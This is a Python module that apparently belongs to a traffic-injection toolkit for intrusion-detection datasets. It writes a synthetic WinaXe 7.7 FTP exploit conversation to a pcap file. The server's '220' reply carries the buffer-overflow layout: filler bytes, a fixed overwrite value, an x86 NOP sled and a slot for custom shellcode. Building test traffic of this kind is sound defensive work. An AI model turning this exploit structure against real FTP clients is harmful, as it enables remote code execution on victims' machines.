import logging
import random as rnd

import scapy.layers.inet as inet

import Attack.AttackParameters as atkParam
import Attack.BaseAttack as BaseAttack
import ID2TLib.Utility
import ID2TLib.Utility as Util

# Only let scapy's runtime logger emit messages of ERROR severity or higher.
logging.getLogger(name="scapy.runtime").setLevel(level=logging.ERROR)

# noinspection PyPep8

# TCP port of the FTP service: the victim (client) connects to it on the attacker (server).
ftp_port = 21


class FTPWinaXeExploit(BaseAttack.BaseAttack):
    """
    Attack generator that injects a WinaXe 7.7 FTP exploit conversation into a capture.

    Roles: the victim is the FTP client (IP_SOURCE / MAC_SOURCE) and the attacker is the
    FTP server (IP_DESTINATION / MAC_DESTINATION) listening on ``ftp_port``. After the TCP
    handshake the attacker answers with a ``220`` reply made of filler bytes plus a
    (custom or random) payload, then closes the connection.
    """

    def __init__(self):
        """
        Creates a new instance of the FTPWinaXeExploit and registers its supported parameters.
        """
        # Initialize attack
        super(FTPWinaXeExploit, self).__init__("FTPWinaXe Exploit", "Injects an WinaXe 7.7 FTP Exploit.",
                                               "Privilege elevation")

        # Define allowed parameters and their type
        self.supported_params.update({
            atkParam.Parameter.IP_SOURCE: atkParam.ParameterTypes.TYPE_IP_ADDRESS,
            atkParam.Parameter.IP_DESTINATION: atkParam.ParameterTypes.TYPE_IP_ADDRESS,
            atkParam.Parameter.MAC_SOURCE: atkParam.ParameterTypes.TYPE_MAC_ADDRESS,
            atkParam.Parameter.MAC_DESTINATION: atkParam.ParameterTypes.TYPE_MAC_ADDRESS,
            atkParam.Parameter.INJECT_AT_TIMESTAMP: atkParam.ParameterTypes.TYPE_FLOAT,
            atkParam.Parameter.INJECT_AFTER_PACKET: atkParam.ParameterTypes.TYPE_PACKET_POSITION,
            atkParam.Parameter.IP_SOURCE_RANDOMIZE: atkParam.ParameterTypes.TYPE_BOOLEAN,
            atkParam.Parameter.PACKETS_PER_SECOND: atkParam.ParameterTypes.TYPE_FLOAT,
            atkParam.Parameter.CUSTOM_PAYLOAD: atkParam.ParameterTypes.TYPE_STRING,
            atkParam.Parameter.CUSTOM_PAYLOAD_FILE: atkParam.ParameterTypes.TYPE_STRING
        })

    def init_params(self):
        """
        Initialize the parameters of this attack using the user supplied command line parameters.
        Use the provided statistics to calculate default parameters and to process user
        supplied queries.

        Defaults (values are overwritten if the user specifies them):
          * IP_DESTINATION / MAC_DESTINATION: random attacker IP in the most used IP class of the
            background traffic, and a random MAC.
          * IP_SOURCE / MAC_SOURCE: a random valid victim IP from the statistics that differs from
            the attacker IP, and its MAC (a random MAC if the statistics return an empty list).
          * PACKETS_PER_SECOND: mean of sent and received pps of the most used IP address.
          * INJECT_AFTER_PACKET: random packet position in [0, packet count].
          * IP_SOURCE_RANDOMIZE: 'False'; CUSTOM_PAYLOAD and CUSTOM_PAYLOAD_FILE: empty.
        """
        # PARAMETERS: initialize with default values
        # (values are overwritten if user specifies them)
        most_used_ip_address = self.statistics.get_most_used_ip_address()

        # The most used IP class in background traffic
        most_used_ip_class = Util.handle_most_used_outputs(self.statistics.get_most_used_ip_class())
        attacker_ip = self.generate_random_ipv4_address(most_used_ip_class)
        self.add_param_value(atkParam.Parameter.IP_DESTINATION, attacker_ip)
        self.add_param_value(atkParam.Parameter.MAC_DESTINATION, self.generate_random_mac_address())

        random_ip_address = self.statistics.get_random_ip_address()
        # victim should be valid and not equal to attacker
        while not self.is_valid_ip_address(random_ip_address) or random_ip_address == attacker_ip:
            random_ip_address = self.statistics.get_random_ip_address()

        self.add_param_value(atkParam.Parameter.IP_SOURCE, random_ip_address)
        victim_mac = self.statistics.get_mac_address(random_ip_address)
        # The statistics return an empty list when no MAC is known for this IP.
        if isinstance(victim_mac, list) and not victim_mac:
            victim_mac = self.generate_random_mac_address()
        self.add_param_value(atkParam.Parameter.MAC_SOURCE, victim_mac)
        self.add_param_value(atkParam.Parameter.PACKETS_PER_SECOND,
                             (self.statistics.get_pps_sent(most_used_ip_address) +
                              self.statistics.get_pps_received(most_used_ip_address)) / 2)
        self.add_param_value(atkParam.Parameter.INJECT_AFTER_PACKET, rnd.randint(0, self.statistics.get_packet_count()))
        self.add_param_value(atkParam.Parameter.IP_SOURCE_RANDOMIZE, 'False')
        self.add_param_value(atkParam.Parameter.CUSTOM_PAYLOAD, '')
        self.add_param_value(atkParam.Parameter.CUSTOM_PAYLOAD_FILE, '')

    def generate_attack_packets(self):
        """
        Build the attack packets and store them in ``self.packets`` (in timestamp order).

        Conversation (victim = FTP client, attacker = FTP server on ``ftp_port``):
          1. SYN      victim   -> attacker
          2. SYN/ACK  attacker -> victim
          3. ACK      victim   -> attacker
          4. PSH/ACK  attacker -> victim, carrying the ``220`` reply with the exploit payload
          5. FIN/ACK  attacker -> victim
          6. ACK      victim   -> attacker, acknowledging the payload
          7. ACK      victim   -> attacker, acknowledging the FIN

        Also stores the first packet's timestamp (INJECT_AT_TIMESTAMP) in ``self.attack_start_utime``.
        """
        pps = self.get_param_value(atkParam.Parameter.PACKETS_PER_SECOND)

        # Timestamp
        timestamp_next_pkt = self.get_param_value(atkParam.Parameter.INJECT_AT_TIMESTAMP)
        # store start time of attack
        self.attack_start_utime = timestamp_next_pkt

        # Initialize parameters
        ip_victim = self.get_param_value(atkParam.Parameter.IP_SOURCE)
        ip_attacker = self.get_param_value(atkParam.Parameter.IP_DESTINATION)
        mac_victim = self.get_param_value(atkParam.Parameter.MAC_SOURCE)
        mac_attacker = self.get_param_value(atkParam.Parameter.MAC_DESTINATION)

        # The custom payload ends up in the packet as UTF-8 bytes, so its length (used both for
        # the limit check and for the NOP padding below) must be measured on the encoded form;
        # len() of the str under-counts multi-byte characters.
        custom_payload = self.get_param_value(atkParam.Parameter.CUSTOM_PAYLOAD)
        encoded_custom_payload = custom_payload.encode()
        custom_payload_len = len(encoded_custom_payload)
        # Size in bytes of the payload region inside the FTP reply.
        custom_payload_limit = 1000
        Util.check_payload_len(custom_payload_len, custom_payload_limit)

        self.packets = []

        # Create random victim if specified
        if self.get_param_value(atkParam.Parameter.IP_SOURCE_RANDOMIZE):
            # The most used IP class in background traffic
            most_used_ip_class = Util.handle_most_used_outputs(self.statistics.get_most_used_ip_class())
            ip_victim = self.generate_random_ipv4_address(most_used_ip_class, 1)
            mac_victim = self.generate_random_mac_address()

        # Get MSS, TTL and Window size value for victim/attacker IP
        victim_mss_value, victim_ttl_value, victim_win_value = self.get_ip_data(ip_victim)
        attacker_mss_value, attacker_ttl_value, attacker_win_value = self.get_ip_data(ip_attacker)

        # Only the lower bound of the attacker's reply delay is used.
        min_delay, _ = self.get_reply_delay(ip_attacker)

        attacker_seq = rnd.randint(1000, 50000)
        victim_seq = rnd.randint(1000, 50000)

        sport = Util.generate_source_port_from_platform("win7")

        # connection request from victim (client)
        victim_ether = inet.Ether(src=mac_victim, dst=mac_attacker)
        victim_ip = inet.IP(src=ip_victim, dst=ip_attacker, ttl=victim_ttl_value, flags='DF')
        request_tcp = inet.TCP(sport=sport, dport=ftp_port, window=victim_win_value, flags='S',
                               seq=victim_seq, options=[('MSS', victim_mss_value)])
        victim_seq += 1  # SYN consumes one sequence number
        syn = (victim_ether / victim_ip / request_tcp)
        syn.time = timestamp_next_pkt
        timestamp_next_pkt = Util.update_timestamp(timestamp_next_pkt, pps, min_delay)
        self.packets.append(syn)

        # response from attacker (server)
        attacker_ether = inet.Ether(src=mac_attacker, dst=mac_victim)
        attacker_ip = inet.IP(src=ip_attacker, dst=ip_victim, ttl=attacker_ttl_value, flags='DF')
        reply_tcp = inet.TCP(sport=ftp_port, dport=sport, seq=attacker_seq, ack=victim_seq, flags='SA',
                             window=attacker_win_value, options=[('MSS', attacker_mss_value)])
        attacker_seq += 1  # SYN/ACK consumes one sequence number
        synack = (attacker_ether / attacker_ip / reply_tcp)
        synack.time = timestamp_next_pkt
        timestamp_next_pkt = Util.update_timestamp(timestamp_next_pkt, pps, min_delay)
        self.packets.append(synack)

        # acknowledgement from victim (client)
        ack_tcp = inet.TCP(sport=sport, dport=ftp_port, seq=victim_seq, ack=attacker_seq, flags='A',
                           window=victim_win_value, options=[('MSS', victim_mss_value)])
        ack = (victim_ether / victim_ip / ack_tcp)
        ack.time = timestamp_next_pkt
        timestamp_next_pkt = Util.update_timestamp(timestamp_next_pkt, pps)
        self.packets.append(ack)

        # FTP exploit packet
        ftp_tcp = inet.TCP(sport=ftp_port, dport=sport, seq=attacker_seq, ack=victim_seq, flags='PA',
                           window=attacker_win_value, options=[('MSS', attacker_mss_value)])

        # FTP "220" reply: filler bytes, a fixed 4-byte sequence from the exploit template
        # (NOTE(review): its meaning is not documented here) and x86 NOP filler.
        # The random filler is drawn before the custom payload is processed, as before.
        characters = b'220'
        characters += Util.get_rnd_bytes(2065, Util.forbidden_chars)
        characters += b'\x96\x72\x01\x68'
        characters += Util.get_rnd_x86_nop(10, False, Util.forbidden_chars)

        custom_payload_file = self.get_param_value(atkParam.Parameter.CUSTOM_PAYLOAD_FILE)

        # Payload region of exactly custom_payload_limit bytes (assuming check_payload_len
        # rejects oversized payloads — its behavior is not visible in this file).
        if custom_payload == '':
            if custom_payload_file == '':
                # No custom payload: random bytes.
                payload = Util.get_rnd_bytes(custom_payload_limit, Util.forbidden_chars)
            else:
                # File payload first, then NOP padding up to the limit.
                payload = Util.get_bytes_from_file(custom_payload_file)
                Util.check_payload_len(len(payload), custom_payload_limit)
                payload += Util.get_rnd_x86_nop(custom_payload_limit - len(payload), False, Util.forbidden_chars)
        else:
            # NOP padding first, then the user string; padding is computed in bytes.
            payload = Util.get_rnd_x86_nop(custom_payload_limit - custom_payload_len, False, Util.forbidden_chars)
            payload += encoded_custom_payload

        characters += payload
        characters += Util.get_rnd_x86_nop(20, False, Util.forbidden_chars)
        characters += b'\r\n'

        ftp_tcp.add_payload(characters)

        ftp_buff = (attacker_ether / attacker_ip / ftp_tcp)
        ftp_buff.time = timestamp_next_pkt
        timestamp_next_pkt = Util.update_timestamp(timestamp_next_pkt, pps)
        self.packets.append(ftp_buff)
        attacker_seq += len(ftp_tcp.payload)

        # Fin Ack from attacker
        fin_ack_tcp = inet.TCP(sport=ftp_port, dport=sport, seq=attacker_seq, ack=victim_seq, flags='FA',
                               window=attacker_win_value, options=[('MSS', attacker_mss_value)])

        fin_ack = (attacker_ether / attacker_ip / fin_ack_tcp)
        fin_ack.time = timestamp_next_pkt
        timestamp_next_pkt = Util.update_timestamp(timestamp_next_pkt, pps, min_delay)
        self.packets.append(fin_ack)

        # Ack from victim on FTP packet
        ftp_ack_tcp = inet.TCP(sport=sport, dport=ftp_port, seq=victim_seq, ack=attacker_seq, flags='A',
                               window=victim_win_value, options=[('MSS', victim_mss_value)])
        ftp_ack = (victim_ether / victim_ip / ftp_ack_tcp)
        ftp_ack.time = timestamp_next_pkt
        timestamp_next_pkt = Util.update_timestamp(timestamp_next_pkt, pps)
        self.packets.append(ftp_ack)

        # Ack from victim on Fin/Ack of attacker (the FIN consumes one sequence number)
        fin_ack_ack_tcp = inet.TCP(sport=sport, dport=ftp_port, seq=victim_seq, ack=attacker_seq + 1, flags='A',
                                   window=victim_win_value, options=[('MSS', victim_mss_value)])
        fin_ack_ack = (victim_ether / victim_ip / fin_ack_ack_tcp)
        fin_ack_ack.time = timestamp_next_pkt
        self.packets.append(fin_ack_ack)

    def generate_attack_pcap(self):
        """
        Write the generated attack packets to a pcap file, sorted by timestamp.

        Also stores the latest packet timestamp in ``self.attack_end_utime``.

        :return: tuple of (number of attack packets, path of the written pcap file)
        """
        sorted_packets = sorted(self.packets, key=lambda pkt: pkt.time)

        # store end time of attack: the latest timestamp, independent of append order
        self.attack_end_utime = sorted_packets[-1].time

        # write attack packets to pcap
        pcap_path = self.write_attack_pcap(sorted_packets)

        return len(self.packets), pcap_path